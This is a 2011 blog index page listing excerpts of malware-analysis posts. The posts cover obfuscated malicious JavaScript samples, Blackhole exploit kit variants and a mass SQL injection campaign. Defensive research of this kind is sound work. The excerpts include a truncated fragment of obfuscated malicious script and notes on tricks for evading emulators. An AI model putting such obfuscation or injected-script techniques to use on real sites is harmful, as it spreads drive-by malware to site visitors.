Interesting malicious script #4
摘要: The latest iframeinject.P, which uses document.body.appendChild instead of eval.<!--Injection_head[SessionId=4E768C5B,version=2.0,type=Infect,CRC32=3CEB8EB8]--><!--Injection_tail[SessionId=4E768C5B]--><!--Injection_head[SessionId=215F71E2,version=2.0,type=FindDomainName,CRC32=1B78FB82
阅读全文
posted @
2011-10-28 03:18 coordinator 阅读(52) |
评论 (0) 编辑
Interesting malicious script #3
摘要: This is the newest variant of black hole, labeled by MS as Blacole.R. It is still surprising to see the signature of Black hole upgraded nearly a dozen of version in a month or two.I've replaced the payload in <span></span> as it is very large. Eval itself is turned into string and I
阅读全文
posted @
2011-10-28 03:16 coordinator 阅读(65) |
评论 (0) 编辑
Interesting malicious script #2
摘要: This script has eval exposed, but simply replacing eval with alert won't show the malicious payload. In fact, only m[i] will be shown in the popup dialog.And the eval is executed in the catch block, which should be able to defeat a lot of emulators, as emulators usually disable exception for per
阅读全文
posted @
2011-10-26 12:37 coordinator 阅读(12) |
评论 (0) 编辑
Interesting malicious script #1
摘要: 1varCJlKp;functionAyzhzK(){}2varKCfW;varxBtS;varHEKIZIOW="";if('EXHJH'=='vaEYij')LWkpgS();if('CLfChe'=='QiJCNa')uYVR='YcOyK';varUjFXc="sl\x69\x63e";varkBzvW='FUQEEH';if('hyIN'=='Sjacj')YNTWV='MgnooX';varAFXFJ
阅读全文
posted @
2011-10-26 12:31 coordinator 阅读(66) |
评论 (0) 编辑
About the newest Mass SQL Injection
摘要: http://blog.sucuri.net/2011/10/mass-infections-from-jjghui-comurchin-js-sql-injection.htmlAfter searching on Google and Bing, I found this mass-sql-injection attacked 134,000 sites in Google's result and 22,500 sites in Bing's result.Safebrowsing only blocked a minority of them. And the numb
阅读全文
posted @
2011-10-22 07:27 coordinator 阅读(11) |
评论 (0) 编辑